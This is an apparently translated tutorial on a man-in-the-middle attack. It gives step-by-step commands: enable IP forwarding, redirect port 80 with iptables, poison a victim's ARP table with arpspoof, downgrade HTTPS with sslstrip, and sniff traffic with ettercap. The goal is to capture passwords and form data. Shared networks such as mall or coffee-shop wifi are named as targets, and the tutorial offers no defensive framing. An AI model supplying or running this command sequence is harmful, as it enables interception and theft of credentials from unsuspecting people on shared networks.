In this tutorial we will address the type of attack known as Man in the Middle. This test “poison” the ARP table of the victim, causing the attacker machine – our machine – to pass through the router, so that we can intercept the traffic and have access to sensitive data exchanged between the two actors.
The exploration of ARP Poisoning is the fastest method to establish the means of communication between two machines and intercepting information sent between them, causing them to have access to confidential data, passwords, and traffic reports. This method applies only to Ethernet networks ie this type of communication can be summed up in internal networks, be they business, residential or even that free wifi in the food court of the Mall or coffee you like to attend.
In this example will be part of three actors:
192.168.1.52 – attacking machine with Debian 8 Jessie
192.168.1.57 – Victim with Windows 8.1, which can be any other OS, Windows, Linux or OSX
192.168.1.1 – Router as Gateway
2. Preparing the attack.
In this example we need to stay with 3 open ends.
Open the first terminal. Now let’s activate packet redirection.
# echo 1 > /proc/sys/net/ipv4/ip_forward
Now let’s make all the redirection of packets that arrive on port 80 of our machine to port 7777
# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 7777
Now let’s activate Arpspoof to confuse the ARP table of the victim, the syntax is as follows:
# arpspoof -i INTERFACE -t IP-DA-VITIMA IP-DO-GATEWAY
In our case, as I am making the attack a wireless interface syntax would be
# arpspoof -i wlan0 -t 192.168.1.57 192.168.1.1
We’ll leave this open terminal infecting the ARP table of the victim. Let’s open another terminal and put the sslstrip to listen on port 7777
Open another terminal and as root, type:
# sslstrip -l 7777
Now we put the sslstrip to go into listening mode and hear all that get in the door 7777
Open the third terminal and as root, type:
# ettercap -Tq -i wlan0
The ettercap is a powerful network sniffer, is it going to show us all to go through the board wlan0 of our machine. Now the victim machine is fully guarded and interceptaremos every package you send it to the gateway.
Now we wait for the host to access any website and fill out a form. Recalling that the Ettercap and sslstrip will capture everything, not just passwords.